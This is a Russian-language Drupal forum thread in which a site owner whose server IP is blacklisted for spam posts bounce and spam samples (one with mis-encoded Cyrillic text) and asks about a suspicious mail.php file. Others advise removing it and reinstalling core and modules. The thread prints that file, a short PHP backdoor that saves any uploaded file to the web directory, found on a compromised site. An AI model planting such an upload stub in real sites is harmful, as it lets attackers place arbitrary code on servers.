Проблемы с почтой

Главные вкладки

Аватар пользователя JaguarRUS JaguarRUS 12 сентября 2016 в 15:48

На некоторых адресах перестали доходить письма.
Есть подозрения что от них рассылается спам. Что можно сделать?

Текст возвратного письма:

This message was created automatically by mail delivery software.

A message that you sent could not be delivered to one or more of its
recipients. This is a permanent error. The following address(es) failed:

dgorovoy@erpdesign.ru
SMTP error from remote mail server after RCPT TO::
host erpdesign-ru.mail.protection.outlook.com [213.199.154.170]:
550 5.7.606 Access denied, banned sending IP [206.54.183.82]. To request removal from this list please visit https://sender.office.com/ and follow the directions. For more information please go to http://go.microsoft.com/fwlink/?LinkID=526655 (AS16012609)

------ This is a copy of the message, including all the headers. ------
------ The body of the message is 4471619 characters long; only the first
------ 106496 or so are included here.

Return-path:
Received: from [91.202.4.74] (helo=[192.168.0.120])
by guardian-spb.ru with esmtpa (Exim 4.72)
(envelope-from )
id 1bjQRD-0006dF-3c
for dgorovoy@erpdesign.ru; Mon, 12 Sep 2016 15:34:35 +0300
To: dgorovoy@erpdesign.ru
From: =?UTF-8?B?0JPQoNCQ0JbQlNCQ0J3QodCa0JjQmSDQktCe0JvQpdCe0JLQldCm?=

Subject: =?UTF-8?B?0JTQstC10YDQuCDQktC+0LvRhdC+0LLQtdGGINGA0LDRgdGH0LXRgg==?=
Message-ID: <4a748a43-69af-1027-a82a-1e56c008d3c6@volhovec78.ru>
Date: Mon, 12 Sep 2016 15:34:12 +0400
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101
Thunderbird/45.3.0
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="------------A44A7D645ADFDB6B85524861"

This is a multi-part message in MIME format.
--------------A44A7D645ADFDB6B85524861
Content-Type: multipart/alternative;
boundary="------------5DB435B875D9679D9D094C69"

--------------5DB435B875D9679D9D094C69
Content-Type: text/plain; charset=utf-8; format=flowed
Content-Transfer-Encoding: 8bit

а?аОаБб?б?аЙ аДаЕаНб?, а?аАаНаИаИаЛ!

а?аО аВаЛаОаЖаЕаНаИаИ б?аАб?б?аЕб? аДаВаЕб?аЕаЙ а?аОаЛб?аОаВаЕб? / аКаОаЛаЛаЕаКб?аИб? а?аАаЛаАаНб? / аМаОаДаЕаЛб? 7131 аВ
б?аВаЕб?аЕ а?аЕаЛб?аЙ аЈаЕаЛаК

аЁб?аМаМаА аЗаАаКаАаЗаА б? б?б?аЕб?аОаМ аАаКб?аИаИ (15 % б?аКаИаДаКаА аНаА аПаОаЛаОб?аНаА) б?аОб?б?аАаВаИаЛаА *90 465
б?б?аБ *(аПб?аЕаДаОаПаЛаАб?аА 50 Wacko

а?б?б?аЕб? аЗаАаМаЕб?аА б? аПаОаЗ т?? 3 (-500 б?)

а?аОаПаОаЛаНаИб?аЕаЛб?аНаО аОаПаЛаАаВаИб?аВаАб?б?б?б? б?аЛаЕаДб?б?б?аИаЕ б?б?аЛб?аГаИ:

а?аОб?б?аАаВаКаА аДаО аПаАб?аАаДаНаОаЙ 1 000 б?б?аБ

а?аОаДб?аЕаМ аНаА аЛаИб?б?аЕ б? б?б?аЕб?аОаМ аДаОаБаОб?аОаВ 6*150=900 б?б?аБ

аЃб?б?аАаНаОаВаКаА 15 550 б?б?аБ

а˜б?аОаГаО аПаОаД аКаЛб?б? 107 915 б?б?аБ

аЁб?аОаК аПаОб?б?аАаВаКаИ 35 аКаАаЛаЕаНаДаАб?аНб?б? аДаНаЕаЙ

а?аКб?аИб? аДаЕаЙб?б?аВб?аЕб? аДаО 25.09 аВаКаЛб?б?аИб?аЕаЛб?аНаО.

а?аДаЕаМ а?аАб? аДаЛб? аОб?аОб?аМаЛаЕаНаИб? аЗаАаКаАаЗаА.

аЁ б?аВаАаЖаЕаНаИаЕаМ, аМаЕаНаЕаДаЖаЕб? аОб?аДаЕаЛаА аПб?аОаДаАаЖ

а?аВб?аГаИаНб?аЕаВаА аЂаАб?б?б?аНаА

аЄаИб?аМаЕаНаНб?аЙ б?аАаЛаОаН "а?аВаЕб?аИ а?аОаЛб?аОаВаЕб?"
аЁа?аБ, а?б?аАаЖаДаАаНб?аКаИаЙ аПб?-б?, 24
(812) 596-28-97
grazhd24@volhovec78.ru

http://volhovec78.ru/

--------------5DB435B875D9679D9D094C69
Content-Type: text/html; charset=utf-8
Content-Transfer-Encoding: 8bit

Normal
0

false
false
false

RU
X-NONE
X-NONE

MicrosoftInternetExplorer4

/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"а?аБб?б?аНаАб? б?аАаБаЛаИб?аА";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin:0cm;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman","serif";}

а?аОаБб?б?аЙ аДаЕаНб?, а?аАаНаИаИаЛ!
а?аО аВаЛаОаЖаЕаНаИаИ б?аАб?б?аЕб? аДаВаЕб?аЕаЙ а?аОаЛб?аОаВаЕб? /
аКаОаЛаЛаЕаКб?аИб? а?аАаЛаАаНб? /
аМаОаДаЕаЛб? 7131 аВ б?аВаЕб?аЕ а?аЕаЛб?аЙ аЈаЕаЛаК
аЁб?аМаМаА аЗаАаКаАаЗаА б? б?б?аЕб?аОаМ аАаКб?аИаИ (15 % Т б?аКаИаДаКаА аНаА
аПаОаЛаОб?аНаА)
б?аОб?б?аАаВаИаЛаА 90Т 465 б?б?аБ (аПб?аЕаДаОаПаЛаАб?аА
50
Wacko
а?б?б?аЕб?
аЗаАаМаЕб?аА б? аПаОаЗ т?? 3
(-500 б?)

а?аОаПаОаЛаНаИб?аЕаЛб?аНаО
аОаПаЛаАаВаИб?аВаАб?б?б?б? б?аЛаЕаДб?б?б?аИаЕ б?б?аЛб?аГаИ:

а?аОб?б?аАаВаКаА
аДаО аПаАб?аАаДаНаОаЙ
1Т 000
б?б?аБ

а?аОаДб?аЕаМ
аНаА аЛаИб?б?аЕТ б?
б?б?аЕб?аОаМ аДаОаБаОб?аОаВ 6*150=
900
б?б?аБ

аЃб?б?аАаНаОаВаКаА
15
550 б?б?аБ

а˜б?аОаГаО
аПаОаД аКаЛб?б? 107Т 915
б?б?аБ

Т
аЁб?аОаК
аПаОб?б?аАаВаКаИ 35 аКаАаЛаЕаНаДаАб?аНб?б? аДаНаЕаЙ

а?аКб?аИб?
аДаЕаЙб?б?аВб?аЕб? аДаО 25.09
аВаКаЛб?б?аИб?аЕаЛб?аНаО.

Т
а?аДаЕаМ
а?аАб? аДаЛб? аОб?аОб?аМаЛаЕаНаИб? аЗаАаКаАаЗаА.

Т
Т
Т
аЁ
б?аВаАаЖаЕаНаИаЕаМ, аМаЕаНаЕаДаЖаЕб?
аОб?аДаЕаЛаА аПб?аОаДаАаЖ

а?аВб?аГаИаНб?аЕаВаА
аЂаАб?б?б?аНаА

аЄаИб?аМаЕаНаНб?аЙ
б?аАаЛаОаН
"а?аВаЕб?аИ а?аОаЛб?аОаВаЕб?"


аЁа?аБ, а?б?аАаЖаДаАаНб?аКаИаЙ аПб?-б?, 24

(812) 596-28-97

grazhd24@volhovec78.ru

http://volhovec78.ru/
Т

--------------5DB435B875D9679D9D094C69--

Комментарии

Аватар пользователя Studio VIZA Studio VIZA 12 сентября 2016 в 15:55

Сейчас при взломе, а взлом подразумевает далеко не только ссыли на проно-сайты - взламывается также и почтовый сервер.
Начинается спам рассылка с вашего сервера. Если выше вас никого нет - остановить может его величество Гугл, что он и делает. Бан айпишнику... и переезд сервера жизненно необходим.
----------------
но это я отписал худший вариант, что у вас - нужно детально смотреть

Аватар пользователя JaguarRUS JaguarRUS 15 декабря 2016 в 11:17

Они просят зачистить сайт и сообщить им. Тогда они что-то будут делать.
Подозрения что подобрали пароли к почтовикам на разных доменах. Как минимуму нужно теперь их менять.

Аватар пользователя vgo vgo 16 декабря 2016 в 10:31

Ну тогда ничего не поможет (( смена IP тоже поможет лишь на короткое время.
Админы почтовиков бывают разумные и не очень.

Почтовый домен нашей фирмы когда-то не полюбился mail.ru, хотя это корпоративный домен, фирма небольшая и массовой рассылки спама там отродясь не было, это под контролем.
Когда и почему - не может сообщить и сам mail.ru, у которого мы пытались это выяснить. Ну и делать ничего не хотят.
Наши письма падают там в спам.

Так и живем.

Аватар пользователя JaguarRUS JaguarRUS 19 декабря 2016 в 13:23

Нашел тут один файл mail.php
Лежит в sites/all/modules/metatag/

Код
<?php
if ($mode=='upload') {
if(is_uploaded_file($_FILES["filename"]["tmp_name"]))
{
move_uploaded_file($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]);
echo $_FILES["filename"]["name"];
}
}
?>

Для чего он? Антивирь ругается

Аватар пользователя gun_dose gun_dose 19 декабря 2016 в 13:44

Файл 100% лишний. Чтобы удалить все такие файлы, нужно сперва составить список всех установленных модулей, затем удалить ядро, папку модулей, залить свежее ядро и все контриб-модули через drush. Файлы кастомных модулей, темы и папку files проверить вручную. Работы мнут на 20.

Аватар пользователя bsyomov bsyomov 19 декабря 2016 в 21:27

Только сначала надо применять, hacked как минимум, и проверить, есть-ли изменённые модули - их скачать не откуда.
Их тоже надо проверять вручную.

«темы и папку files проверить вручную.»
Для человека не смыслящего в php это непосильная задача. А наш автор топика не разработчик.

Аватар пользователя dgastudio dgastudio 20 декабря 2016 в 9:24

тут проблема будет в следующем, что не специализированные хаки как правило не меняют исходных код, а добавляют левые файлы, которые потом по определенному паттерну собираются в одно.
поэтому хакед ничего не даст особо

оптимальные вариант (если все конечно сделаю по минимальному феншую и все лежит на своих местах), это снести все кроме sites, поставить друпал с нуля, обновить/переустановить через drush dl все существующие модули (папка модуля будет перезаписана) и потом уже только прошестерить тему на наличие багов

но, как вы правильно заметили, учитывая что автор не тематический специалист, лучше бы ему заказать услуги специалиста

Аватар пользователя bsyomov bsyomov 20 декабря 2016 в 17:22
1

Hacked отнюдь не для того предлагалось использовать. А для того, чтобы не затереть изменения в модулях сделанные горе разработчиками.

Аватар пользователя gun_dose gun_dose 21 декабря 2016 в 0:05

Обычно проверяю именно с этой целью. И как-то всегда везло. С ужасом представляю картину, если половина хаков будет от взлома и половина от горе-разраба)))

Аватар пользователя JaguarRUS JaguarRUS 20 декабря 2016 в 14:20

Заражение не обязательно мб на сайте друпала. Битрикс так же есть. Сегодня одно письмо скинула тп хостинга
на данный момент с IP 206.54.183.82 рассылается спам. Почтовый сервер остановлен.

Пример письма:

Received: from guardian-spb.ru ([206.54.183.82] helo=torex-spb.ru)
by guardian-spb.ru with esmtp (Exim 4.72)
(envelope-from )
id 1cJFK0-0000o2-Kt
for craig.drady@yahoo.com.au; Tue, 20 Dec 2016 10:58:52 +0300
Date: Tue, 20 Dec 2016 07:58:51 +0000 (UTC)
From: info@torex-spb.ru
Reply-To: no-rep891
To: craig.drady@yahoo.com.au
Message-ID: <2091430871.40501.1482220731673@torex-spb.ru>
Subject: hey there
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_Part_40500_584557334.1482220731673"
X-Scanned-By: ClamAV 0.99; Tue, 20 Dec 2016 10:58:52 +0300
X-Spam_score: 3.2
X-Spam_score_int: 32
X-Spam_bar: +++
X-Spam_report: Spam detection software, running on the system "guardian-spb.ru", has
identified this incoming email as possible spam. The original message
has been attached to this so you can view it (if it isn't spam) or label
similar future email. If you have any questions, see
the administrator of that system for details.

Content preview: Vǐαgra helps 8 out of 10 males have erection hard enough
for sexual pleasure For rock-hard erections click here Vǐαgra helps 8 out
of 10 males have erection hard enough for sexual pleasure For rock-hard erections
click here [...]

Content analysis details: (3.2 points, 5.0 required)

pts rule name description
---- ---------------------- --------------------------------------------------
2.7 RCVD_IN_PSBL RBL: Received via a relay in PSBL
[206.54.183.82 listed in psbl.surriel.com]
0.5 FUZZY_VPILL BODY: Attempt to obfuscate words in spam
0.0 HTML_MESSAGE BODY: HTML included in message

и тд